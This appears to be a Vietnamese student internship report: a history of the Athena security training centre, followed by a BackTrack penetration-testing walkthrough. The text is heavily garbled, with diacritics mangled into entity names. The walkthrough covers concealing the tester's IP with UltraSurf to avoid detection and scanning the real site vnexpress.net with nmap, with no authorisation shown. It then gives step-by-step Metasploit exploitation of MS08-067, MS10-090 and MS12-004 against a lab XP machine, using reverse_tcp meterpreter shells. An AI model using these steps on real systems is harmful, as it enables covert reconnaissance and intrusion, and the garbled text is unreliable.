Năm 2000 một nhoacutem caacutec thagravenh viecircn lagrave những doanh nhacircn tagravei năng vagrave thagravenh cocircng trong
lĩnh vực cocircng nghệ thocircng tin đatilde nhận ra tiềm năng phaacutet triển của việc đagraveo tạo nền cocircng
nghệ thocircng tin nước nhagrave Họ lagrave những caacute nhacircn coacute trigravenh độ chuyecircn mocircn cao vagrave coacute đầu oacutec
latildenh đạo cugraveng với tầm nhigraven vagrave về tương lai của ngagravenh cocircng nghệ thocircng tin họ đatilde quy tụ
được một lực lượng lớn đội ngũ cocircng nghệ thocircng tin trước hết lagrave lagravem nhiệm vụ ứng cứu
maacutey tiacutenh cho caacutec doanh nghiệp caacute nhacircn coacute nhu cầu Bước phaacutet triển tiếp theo lagrave vươn tầm
đagraveo tạo đội ngũ caacuten bộ cocircng nghệ thocircng tin cho đất nước vagrave xatilde hội
Caacutec thagravenh viecircn saacuteng lập bao gồm
Ocircng Nguyễn Thế Đocircng Cựu giaacutem đốc trung tacircm ứng cứu Athena hiện tại lagrave giaacutem đốc
dự aacuten cocircng ty Siemen Telecom
Ocircng Hứa Văn Thế Phuacutec Phoacute Giaacutem Đốc Phaacutet triển Thương Mại Cocircng ty EIS Phoacute
Tổng Cocircng ty FPT
Ocircng Nghiecircm Sỹ Thắng Phoacute Tổng Giaacutem Đốc Ngacircn hagraveng Liecircn Việt chịu traacutech nhiệm
cocircng nghệ thocircng tin của ngacircn hagraveng
Ocircng Votilde Đỗ Thắng hiện lagrave Giaacutem Đốc Trung tacircm đagraveo tạo quản trị vagrave an ninh mạng
Athena
Đến năm 2003 bốn thagravenh viecircn saacuteng lập cugraveng với đội ngũ ứng cứu maacutey tiacutenh gần 100 thagravenh
viecircn hoạt động như lagrave một nhoacutem một tổ chức ứng cứu maacutey tiacutenh miền Nam Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng hay cograven gọi lagrave Trung tacircm đagraveo tạo
Quản trị vagrave An ninh mạng Quốc Tế Athena (tecircn thương hiệu viết tắt lagrave TRUNG TAcircM
ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
